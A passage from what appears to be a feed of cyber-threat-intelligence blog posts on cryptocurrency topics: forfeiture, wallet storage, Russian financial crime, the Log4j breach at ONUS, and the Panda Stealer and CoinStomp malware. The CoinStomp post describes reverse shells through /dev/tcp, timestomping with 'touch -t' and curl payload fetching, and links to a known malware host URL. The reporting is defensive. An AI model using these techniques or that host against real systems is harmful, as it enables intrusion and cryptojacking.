<p>But extending <em>civil</em> forfeiture casts far too wide a net and would make it much more likely for innocent holders to lose their crypto to government confiscation. After all, civil forfeiture lacks a conviction requirement, unlike criminal forfeiture. Moreover, there is a direct financial incentive for federal agencies to pursue forfeiture cases: Once property has been forfeited (either civilly or criminally), the seizing federal agency can retain up to 100% of the proceeds.</p>
<p>The proposed expansions in asset forfeiture are part of a broader assault on cryptocurrency, including attacks on the financial privacy cryptocurrency can otherwise afford. The Treasury Department’s Financial Crimes Enforcement Network (FinCEN) is currently considering a <a href="https://www.reginfo.gov/public/do/eAgendaViewRule?pubId=202104&RIN=1506-AB41">rule</a> that would extend intrusive reporting requirements to custodial wallets (i.e. those managed by a third-party) the same reporting requirements that led the IRS to seize Ken’s cash.</p>
<p>If adopted, the wallet’s host would have to send detailed reports to FinCEN for every transaction with an unhosted wallet over $10,000, including personal information like the names and physical addresses of both parties involved in the transaction. Since the blockchain is inherently public, a single report on a single transaction would effectively become a digital skeleton key, letting the federal government snoop on all of the wallet’s other transactions.</p>
<p>This is moving in precisely the wrong direction. No matter how the midterms shake out, Congress must reject the proposed crypto crackdown and rein in civil forfeiture.</p>
<p>The 4<sup>th</sup> Amendment to the US Constitution: </p>
<p>The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things. </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br />Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br /> LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p> </p>
<p>Article here: <a href="{{#staticFileLink}}10859342886,original{{/staticFileLink}}">TR-22-304-001.pdf</a></p></div>Crypto Storage Optionshttps://redskyalliance.org/xindustry/crypto-storage-options2022-06-27T16:33:00.000Z2022-06-27T16:33:00.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}10599272298,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10599272298,RESIZE_400x{{/staticFileLink}}" width="250" alt="10599272298?profile=RESIZE_400x" /></a>Cryptocurrency storage is one of the most important things that investors should consider when joining the burgeoning digital asset market. Most people investing in this space have little to no knowledge of the existing options. Crypto exchanges currently hold the larger share of investors’ capital despite the associated risks, including hacking and regulatory pressures from oversight authorities. </p>
<p>There are two types of crypto wallets; custodial and non-custodial. The former is offered by centralized crypto service providers while the latter requires no third party intervention. Non-custodial wallets give crypto users access to their private keys, meaning that an investor is fully in control of their funds at any point in time. </p>
<p>What is the danger of storing crypto funds in a custodial wallet? This type of crypto storage retains a user’s private keys hence limiting them from accessing their funds without the permission of the service provider. In the past, there have been several cases where crypto investors funds or value as a result of crypto exchanges being hacked or directives from authorities to freeze funds. </p>
<p>Some of the recent incidents include the Mt.Gox <a href="https://www.buybitcoinworldwide.com/mt-gox-hack/#:~:text=Gox%20took%20a%20devastating%20hit,the%20end%20of%20February%202014.">hack</a> in 2014 where 850,000 Bitcoins were siphoned from the exchange (roughly worth $460 million in 2014). Regulation authorities have previously seized crypto assets through the help of centralized exchanges. Additionally, it has become quite easy for regulators to direct the freezing of crypto funds due new compliance laws such as the 5AMLD and MiCA. </p>
<p>Similar to most tech innovations, the crypto ecosystem has evolved to feature a wide range of products; users now have the option of storing their assets with exchanges or non-custodial wallets. While centralized crypto custody still enjoys a comfortable lead, non-custodial wallets have begun going mainstream given their value proposition when it comes to the principle of decentralization. </p>
<p>Investors have several options that crypto users can leverage, which include hardware wallets such as Trezor and Ledger. These off-chain crypto storage solutions are designed as a hard disk (cold storage) that can only be accessed through a private key held by the owner. This means that no government institution can gain access to one’s crypto funds; however, they can be hacked should a malicious player obtain the login credentials. </p>
<p>The other alternative is a software wallet like Metamask; according to the latest <a href="https://consensys.net/blog/press-release/metamask-surpasses-10-million-maus-making-it-the-worlds-leading-non-custodial-crypto-wallet/">update</a> by Consenysys, this wallet hosts over 10 million monthly active users (MAUs). This relates to a large share of the crypto market, given that Decentralized Finance (DeFi) innovations on Ethereum recent increase in market share. Metamask’s current infrastructure is advanced for the new entrants in the crypto market. </p>
<p>There are some Metamask alternatives such as the <a href="https://www.ambire.com/">Ambire</a> wallet which offers a simpler user interface. This non-custodial wallet features an email registration option, eliminating the need for crypto investors to manage complex seed phrases. Ambire has launched a web application that new investors can easily navigate compared to the browser extension offered by Metamask. </p>
<p>Crypto investors are not limited to the services offered by centralized exchanges. It is much easier to navigate the DeFi ecosystem through non-custodial wallets like Metamask and Ambire.</p>
<p>The value of any asset is largely dependent on the ability to liquidate without much trouble; that being the case, crypto investors ought to be very careful about where they store their assets. As much as crypto exchanges are easily accessible, the underlying risks cannot be ignored. It is much better to store one’s funds in a decentralized platform where they have full control instead of relying on centralized intermediaries that have proven to be easily compromised by hackers and regulatory measures. </p>
<p>Investors beware: Crypto assets have lost nearly $800 billion in market value in the past 30 days per a recent report posted on pymnts.com.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at <a>1-844-492-7225</a>, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p><br /> </p>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br />Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br />LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p> </p>
<p>Article: <a href="{{#staticFileLink}}10599272473,original{{/staticFileLink}}">TR-22-178-001.pdf</a></p></div>Russian Bank Robbershttps://redskyalliance.org/xindustry/russian-bank-robbers2022-04-26T14:47:53.000Z2022-04-26T14:47:53.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10440901073,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10440901073,RESIZE_400x{{/staticFileLink}}" width="250" alt="10440901073?profile=RESIZE_400x" /></a>The financial sector is a prime target for criminal cartels and nation-state actors. Criminals seek a lucrative market, and nation-states treat profit as a form of sanctions-busting. The high volume of Russian-speaking gangs and the current sanctions against the Russian state makes Russia a major threat to financial institutions today.</p>
<p>The reason that financial institutions are under constant attack is simple: that’s where the money is today. This is no different than the statement made by the famous 1930’s bank robber, Willie Sutton, when asked why he robbed banks, his reply was, “I rob banks because that is where the money is.” The 21st Century bank robbers are advanced criminal gangs (often part of a larger cartel) and nation-states. The nation-state attackers are particularly North Korean or Russian, where the proceeds are used to offset sanctions. According to the World Economic Forum, the proceeds associated with the dark web are more than $1 trillion per year and it is estimated that more than 50% of that goes right back into the Russian economy. Or President Putin’s personal bank accounts</p>
<p>The complexity of the Russian threat comes from the connections between the criminal cartels and the Russian state agencies. Consider ransomware; most of the ransomware gangs are Russian speaking, which is why most ransomware will not detonate on anything that has a Russian language package,” he said. “But in order to exist as a ransomware gang, typically part of a larger cybercrime cartel, you have to pay homage to the GRU [the foreign military intelligence agency of the General Staff of the Armed Forces of the Russian Federation] and the FSV [the Federal Security Service of the Russian Federation].</p>
<p>The way you do that is to share your information or more specifically, access to the RAT you left behind. And if called upon to be patriotic, you may be called upon to be more destructive in your endeavors within the financial institutions. ‘Destructive’ in the finance sector, does not mean the deployment of a wiper to destroy systems, but manipulation of the data to make it wrong or worthless.</p>
<p>The Russian government doesn’t want to take down the financial sector, because they are regularly robbing it to offset economic sanctions. What they will typically do is leverage destructive attacks as part of the counter incident response when they realize that law enforcement has become involved. While ransomware is up this year, it does not represent the primary source of income for criminals. This comes from market manipulation through the abuse of stolen financial information.</p>
<p>Financial acumen might help with malicious digital insider trading, but it is far from necessary. Understanding that non-public market information is worth more than money because you can benefit from understanding non-public market information.</p>
<p>Investigators report that a simple way of getting this information is to target the laptops used by the people that manage the portfolios and market strategies of the financial institutions. Criminals can spy on them until they see a major position about to be taken, or find a presentation that will be made to the senior management.</p>
<p>Present in all financial institutions there is always a surveillance department that conducts traditional surveillance for regulatory compliance on everyone who conducts finance. Unfortunately, there is a disconnection between the surveillance department and the cybersecurity department. The surveillance department is looking for a traditional insider threat rather than a digital insider threat. A trader might not have been a threat, but there was something on his machine that could be used by others as an advantage.</p>
<p>One of the biggest year-on-year threats reported has been called island hopping. Island hopping is similar to supply chain threats, but different because in the finance sector there is no clearly defined end target, as a prime contractor. Each hop opens multiple new possibilities (targets) and the criminals will not stop “hopping” as more targets emerge.</p>
<p>The concern over cryptocurrency exchange security is not because they are financial institutions, but precisely because, in the technical sense, they are not financial institutions. In short, they are not controlled or regulated in the same way as official financial institutions. The security of crypto exchanges is minimal because of an over-reliance on the security of blockchains. Many of these exchanges realize that they are complicit in the laundering of cybercriminal proceeds, and they just turn a blind eye to it because they don’t have any reporting requirements and they still earn their fees.<a href="#_ftn1">[1]</a></p>
<p>But at the same time, financial institutions are moving to fintech through digital transformation. The financial institutions are trying to become part of the new digital world and they are partnering with these exchanges and virtual currencies to facilitate adoption and greater liquidity for proceeds from retail customers. Where this becomes interesting and potentially damaging is in the use of APIs between the two organizations, and the ongoing surge in API attacks. As a result, the poor security posture of a crypto exchange could lead to island hopping via an API into the financial institution.</p>
<p>It is currently the practice that CISOs at financial institutions still report to the CIO. Cyber threat professionals have stated the opinion that if there was ever an industry that necessitates the CISO to be more significant than the CIO, it is finance. There may be a conflict of interest for a CIO to be managing a CISO in the financial sector. The charter of financial institutions is safety and soundness and trust and confidence. But in the age of digital transformation for financial institutions, the CIO will inherently increase the attack surface. The CISO is more concerned with risk management and risk management should be the dominant paradigm in finance.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<ul>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings:</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/vmwares-head-cybersecurity-strategy-discusses-modern-bank-heists">https://www.securityweek.com/vmwares-head-cybersecurity-strategy-discusses-modern-bank-heists</a></p></div>A Look into CoinStomp and Cryptojackinghttps://redskyalliance.org/xindustry/a-look-into-coinstomp-and-cryptojacking2022-02-17T14:25:43.000Z2022-02-17T14:25:43.000ZMichael Brousseauhttps://redskyalliance.org/members/MichaelBrousseau<div><p><a href="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}" alt="10115777254?profile=RESIZE_400x" width="216" /></a>A new malware family is targeting Asian cloud service providers and using compromised resources to mine cryptocurrency. The malware, CoinStomp, makes use of Timestomping, Command and Control through reverse shells, removal of target system’s cryptographic policies, and references to a previous cryptojacking campaign, Xanthe.</p>
<p>Cryptojacking is the process of compromising machines and using their resources to mine for cryptocurrencies. This attack method has grown popular as an alternative to building sophisticated mining machines which create large overhead costs. By compromising existing machines, attackers can mine crypto without paying for resources. The formula is simple, the more resources an attacker has access to the more crypto they can mine. Cloud service providers are a lucrative target for cryptojacking attackers because CSPs provide solutions including Infrastructure as a Service (IaaS), which provides resources directly to customers. The infrastructure is already in place, all the attacker needs to do is gain access.</p>
<p>Cryptojacking software is designed to run unbeknownst to the victim. To remain undetected CoinStomp uses a technique called Timestomping. Timestomping involves the manipulation of file timestamps. It is frequently used to confuse and mislead digital forensic investigators. Timestomping allows attackers to change the access records and file creation records to help malicious files blend into the target environment. A query based on recently installed files and programs will yield little evidence if the time stamps of the malicious files have been manipulated. On Linux systems a simple “touch” command with the “-t” flag and a made-up timestamp can be used to change the timestamp.</p>
<p>Using reverse shells to contact the Command and Control (C2) servers on port 443, typically used for https traffic, means that this traffic will usually pass seamlessly through the firewall, as outbound https traffic is not normally restricted. The reverse shell uses /dev/tcp/[host]/[port] to create a tcp connection to the designated host on the specified port. Using this command, the attacker can allow for read/write privileges. The malware also uses curl to install additional payloads and provide status updates to the C2 servers.</p>
<p>To allow for successful installation of payloads, CoinStomp uses a command to remove cryptographic policy files. These policies are responsible for allowing or blocking protocols based on the cryptographic protocol version. Usually, insecure protocols will be blocked, but malware often makes use of these protocols for installations and remote connections. By disabling the cryptographic policies CoinStomp can install payloads and make the connections it needs.</p>
<p>CoinStomp uses the Cron scheduler to carry out tasks and immersed in the code is a URL that has been commented out, meaning there is no command to reach the URL. Researchers at Cado Security followed the URL to <a href="http://xanthe.anondns.net:8080/files/fczyo">http://xanthe.anondns.net:8080/files/fczyo</a>. Xanthe was previously a cryptojacking campaign that now has ties to the Abcbotnet and Distributed Denial of Service (DDoS) attacks. The Xanthe cryptojacking campaign made use of a script called fczyo. This may point to a connection to the Xanthe campaign, but it is also possible that it was an attempt to mislead investigators.</p>
<p>The recent discovery of the CoinStomp malware family points out that attackers are knowledgeable about cloud security vulnerabilities, Linux security techniques, and how to mislead digital forensics investigators in the incident response process. Cado Security provided Indicators of Compromise (IoCs) which are pictured below.</p>
<p><a href="{{#staticFileLink}}10115777291,RESIZE_930x{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115777291,RESIZE_710x{{/staticFileLink}}" alt="10115777291?profile=RESIZE_710x" width="600" /></a><a href="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}" alt="10115778058?profile=RESIZE_180x180" width="171" /></a></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p></div>Vietnamese Crypto Trading Platform Hit with Log4jhttps://redskyalliance.org/xindustry/vietnamese-crypto-trading-platform-hit-with-log4j2022-01-12T17:02:57.000Z2022-01-12T17:02:57.000ZMichael Brousseauhttps://redskyalliance.org/members/MichaelBrousseau<div><p><a href="{{#staticFileLink}}10006159689,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10006159689,RESIZE_400x{{/staticFileLink}}" alt="10006159689?profile=RESIZE_400x" width="250" /></a>ONUS, the Vietnamese crypto trading platform, recently experienced an attack stemming from the Log4j vulnerability (CVE-2021-44228).<a href="#_ftn1">[1]</a> ONUS allows users to trade crypto currencies through their app which is available for iOS and Android. The organization has grown significantly in the past 18 months since the app’s launch in March of 2020, with a large portion of users in Vietnam, Nigeria, and the Philippines.<a href="#_ftn2">[2]</a></p>
<p>Financial organizations and crypto platforms in particular are juicy targets for attackers who are looking to lift personal information, payment information, and monetary sums, all of which are present in a typical crypto company’s data stores. ONUS is no different as the Log4j exploit allowed attackers to access stored information about the organization’s customers.</p>
<p>The vulnerability existed in the point-of-sale (POS) solution used by ONUS and the attackers were able to get into servers and create a backdoor for extended access to electronic Know Your Customer (e KYC) information which includes identification documents, customer video selfies, among other information to authenticate customers.</p>
<p>CyStack, the vendor for the POS solution Cyclos used by ONUS, acknowledged that the Log4j vulnerability was the entry point for the attacks. Upon further analysis CyStack determined that attackers leveraged misconfigurations and permissions in ONUS’ AWS S3 buckets to access and exfiltrate the information.</p>
<p>The attackers were able to make off with the data before an update patching the Log4j vulnerability was available and demanded $5 million in ransom for the stolen information. The Log4j exploit has been used in the wild to install malware, use remote machines for crypto mining, and deploy ransomware binaries.<a href="#_ftn3">[3]</a></p>
<p>The attackers waited until 25 December 2021 for payment from ONUS, and when they did not receive the ransom, the attackers put the information of close to 2 million customers up for sale. The data was listed on the Raid forum and includes personal information and hashed passwords.<a href="#_ftn4">[4]</a> This data also includes e KYC information which is comprised of Identification Cards, Passports, and video selfies of users for authentication purposes.<a href="#_ftn5">[5]</a></p>
<p>CyStack did ultimately make recommendations for ONUS to help prevent these vulnerabilities from being exploited in the future. These recommendations include:</p>
<ul>
<li>Patching the Log4j vulnerability in Cyclos using the vendor’s instructions.</li>
<li>Deactivating all of the leaked credentials for the AWS S3 buckets.</li>
<li>Configuring permissions to secure access to AWS S3 buckets.</li>
<li>Blocking public access to S3 buckets and requiring tokens for access to sensitive objects.</li>
</ul>
<p>The Log4j vulnerability has been extensively exploited since its discovery in late 2021. Organizations and vendors are scrambling to create and implement patches for this zero-day that allows for remote code execution. The Log4j vulnerability received a CVSS score of 10, meaning it is a critical risk. Common Vulnerability Scoring System (CVSS) is used to rate vulnerabilities so cyber security professionals can prioritize their patching efforts.</p>
<p>A rating of 10 puts remediation of this vulnerability at the top of your security priority list. Updating to the Log4j version 2.17 and will aid in the remediation process. Based on statistics by Snyk, 60.8% of Java projects rely on Log4j indirectly, which means even if your organization is not using software that directly relies on Log4j there are dependencies that could indirectly affect your security posture. <a href="#_ftn6">[6]</a></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p> Weekly Cyber Intelligence Briefings:</p>
<ul>
<li> Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p><a href="#_ftnref1">[1]</a> ONUS Trading Platform From: Lưu Quý/ VnExpress</p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.globenewswire.com/news-release/2021/12/20/2355023/0/en/1-5-million-users-in-just-18-months-with-ONUS-anyone-can-have-some-Bitcoin.html">https://www.globenewswire.com/news-release/2021/12/20/2355023/0/en/1-5-million-users-in-just-18-months-with-ONUS-anyone-can-have-some-Bitcoin.html</a></p>
<p> <a href="#_ftnref3">[3]</a> <a href="https://venturebeat.com/2021/12/21/second-ransomware-family-exploiting-log4j-spotted-in-u-s-europe/">https://venturebeat.com/2021/12/21/second-ransomware-family-exploiting-log4j-spotted-in-u-s-europe/</a></p>
<p><a href="#_ftnref4">[4]</a> <a href="https://coinlive.me/more-than-2-million-onus-users-have-their-information-leaked-on-the-raid-forum-12287.html">https://coinlive.me/more-than-2-million-onus-users-have-their-information-leaked-on-the-raid-forum-12287.html</a></p>
<p><a href="#_ftnref5">[5]</a> <a href="https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/">https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/</a></p>
<p><a href="#_ftnref6">[6]</a> <a href="https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/">https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/</a></p></div>Do you know where your Bitcoins are Today?https://redskyalliance.org/xindustry/do-you-know-where-your-bitcoins-are-today2021-05-26T21:07:51.000Z2021-05-26T21:07:51.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}8989703898,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8989703898,RESIZE_400x{{/staticFileLink}}" width="250" alt="8989703898?profile=RESIZE_400x" /></a>A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam. <a href="https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html">Panda Stealer</a> malware uses spam emails and the same hard-to-detect fileless distribution method deployed by a recent <a href="https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware">Phobos</a> ransomware campaign discovered by investigators.</p>
<p>The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States. Panda Stealer was discovered by <a href="https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html">Trend Micro</a> at the beginning of April 2021. Threat researchers have identified two infection chains being used by the campaign. Analysts said: "In one, an .XLSM attachment contains macros that download a loader, then the loader downloads and executes the main stealer. </p>
<p>"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command." Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.</p>
<p>Panda has other uses, such as the ability to take screenshots of the infected computer and the power to exfiltrate data from browsers, like cookies, passwords, and cards. Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended. </p>
<p>Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de. "Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers. CollectorStealer (also known as DCStealer) is malicious software which allows cyber criminals to steal various sensitive information (e.g. passwords, credit card details) and files. This malware is for sale on a hacker forum for $12 or $75 (depending on the subscription type). It is advertised on the aforementioned forum as a "top-end information stealer" with a Russian interface.</p>
<p>While the stealers behave similarly, they have different command and control server URLs, build tags, and execution folders. When analyzing the different types of attacks analysts detected across seven million enterprise endpoints over the last 12 months. Researchers found that infostealers made up the highest percentage of attempted endpoint attacks (31%). </p>
<p>Red Sky Alliance has been has analyzing and documenting cyber threats and groups for over 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org/">https://redskyalliance.org</a> at no charge. Many past tactics are reused in current malicious campaigns.</p>
<p>To protect your own supply chain, consider subscribing to RedXray, Red Sky Alliance’s cyber threat notification service. Details can be found at: <a href="https://www.wapacklabs.com/redxray">https://www.wapacklabs.com/redxray</a>.</p>
<p><br /> Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at <a>1-844-492-7225</a>, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p><br /> </p>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br /> Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br /> LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p> </p>
<p><a href="{{#staticFileLink}}8989705655,original{{/staticFileLink}}">TR-21-146-001_Bitcoin.pdf</a></p>
<p> </p>
<p><a href="https://www.infosecurity-magazine.com/news/panda-stealer-targets-crypt">https://www.infosecurity-magazine.com/news/panda-stealer-targets-crypt</a></p></div>Can Cryptocurrency Regulation stop Ransomware Attacks? Unlikelyhttps://redskyalliance.org/xindustry/can-cryptocurrency-regulation-stop-ransomware-attacks-unlikely2021-05-23T22:08:26.000Z2021-05-23T22:08:26.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}8959863057,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8959863057,RESIZE_400x{{/staticFileLink}}" width="250" alt="8959863057?profile=RESIZE_400x" /></a>A coalition of government agencies and security firms has released a <a href="https://securityandtechnology.org/blog/ransomware-task-force-to-unveil-comprehensive-framework-to-combat-ransomware/">framework</a> for how to disrupt ransomware attacks that calls for expanded regulation of the global cryptocurrency market to better track the virtual coins paid to cybercriminals during extortion schemes.</p>
<p>On 29 April 2021, the Institute for Security and Technology's <a href="https://dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/ist-ransomware-task-forcefinalreport-1.pdf">Ransomware Task Force</a> published the framework, which features 48 proposals. It calls for a coordinated, international diplomatic and law enforcement effort to combat these cyberthreats - for example, by discouraging nation-states from harboring cybercriminals and their operations. The group also encourages the White House to take the lead on addressing ransomware by creating a group that includes representatives of the National Security Council, the office of the National Cyber Director, and security companies to coordinate the effort.</p>
<p>The Ransomware Task Force also recommends that the U.S. and other nations create a response and recovery fund to support the responses to ransomware. The framework also calls for laws that would require organizations to report ransomware payments.</p>
<p>"One thing is clear, ransomware is a threat to our national security," says Secretary of Homeland Security Alejandro Mayorkas, who has made <a href="https://www.govinfosecurity.com/dhs-to-provide-25-million-more-for-cybersecurity-grants-a-16076">ransomware</a> one of the top cybersecurity priorities for his department. "Like most cyberattacks, ransomware exploits the weakest link. In recent months, ransomware attacks in hospitals in New York, Nebraska, Oregon and in Michigan have taken place during what is an unprecedented pandemic."</p>
<p>Although the framework offers dozens of suggestions, it emphasizes better tracking and regulating the markets for bitcoin and other cryptocurrencies the favorite form of payment for cybercriminal organizations and their affiliates.</p>
<p>"The use of cryptocurrency adds to the challenge of identifying ransomware criminals, as payments with these currencies are difficult to attribute to any individual," according to the report. "Often the money does not flow straight from ransomware victim to criminal; it travels through a multi-step process involving different financial entities, many of which are novel and are not yet part of standardized, regulated financial payments markets."</p>
<p>Philip Reiner, CEO of the Institute for Security and Technology, notes that the goal of the framework is to emphasize that ransomware has grown into a problem that goes far beyond cybercriminals extorting companies.</p>
<p>"Ransomware has risen to the level of being a much broader societal challenge, and a national security threat not just the niche computer crime that impacts organizations," Reiner says. "We were really struck by the notion that with all of the resources that governments and companies around the world have to bring to bear on a problem like this …. How is it that this wreck is continuing to metastasize, and why hasn't someone been able to put together all of the right people to better direct resources?"</p>
<p>In March 2021, <a href="https://www.databreachtoday.com/mark-ransomwares-success-370-million-in-2020-profits-a-16121">Chainalysis</a> published a report that estimated criminal groups reaped $370 million in ransom payments in 2020, up 336% from 2019.</p>
<p>A report published this week by incident response firm Coveware found that in the first quarter of this year, the average cyber extortion payoff reached $220,298, a 43% increase from the previous quarter. This increase is being driven, in part, by ransomware gangs taking advantage of unpatched vulnerabilities in the older versions of the Accellion File Transfer Appliance.</p>
<p>In the report, the Ransomware Task Force notes that in 2020, about 2,400 U.S. organizations were targeted in ransomware attacks, including 1,700 schools, colleges and universities as well as 560 healthcare organizations.</p>
<p>The new framework emphasizes that disrupting the ransomware business model including the ability for cybercriminals to extort cryptocurrency payments from victims and then hide those transactions from law enforcement agencies is key to reducing these types of attacks. An important step, the framework notes, is the adoption of laws and regulations designed to better track the virtual currency that flows from cryptocurrency exchanges, crypto kiosks and over-the-counter trading desks where cybercriminals can hide the transactions and cash out their earnings thanks to loose rules that are now in place.</p>
<p>Agencies such as the U.S. Treasury Department and the Securities and Exchange Commission, along with their international counterparts, also need to improve enforcement of existing rules and regulations, such as anti-money laundering laws and laws that combat financing of terrorism. Some laws, such as the <a href="https://www.cisa.gov/publication/cybersecurity-information-sharing-act-2015-procedures-and-guidance">Cybersecurity Information Sharing Act of 2015</a>, need updates, the framework points out.</p>
<p>The framework also notes that financial institutions need to address ransomware attacks. Banks should "pursue SEC enforcement of cryptocurrency businesses that fail to register as broker-dealers, transfer agents, clearing agencies, and money service businesses, with particular focus on mixing services that obfuscate criminal transactions with legal traffic," the framework states.</p>
<p>Other recommendations in the task force report include:</p>
<ul>
<li>Encouraging cryptocurrency exchanges, trading desks and others to share information with law enforcement agencies about suspicious transactions;</li>
<li>Providing law enforcement agencies with the ability to issue letters to crypto entities requesting that ransomware funds be frozen as proceeds of crime that can then be seized by the government;</li>
<li>Creating the ability to blacklist digital wallets associated with criminal gangs;</li>
<li>Improving civil recovery and asset forfeiture processes;</li>
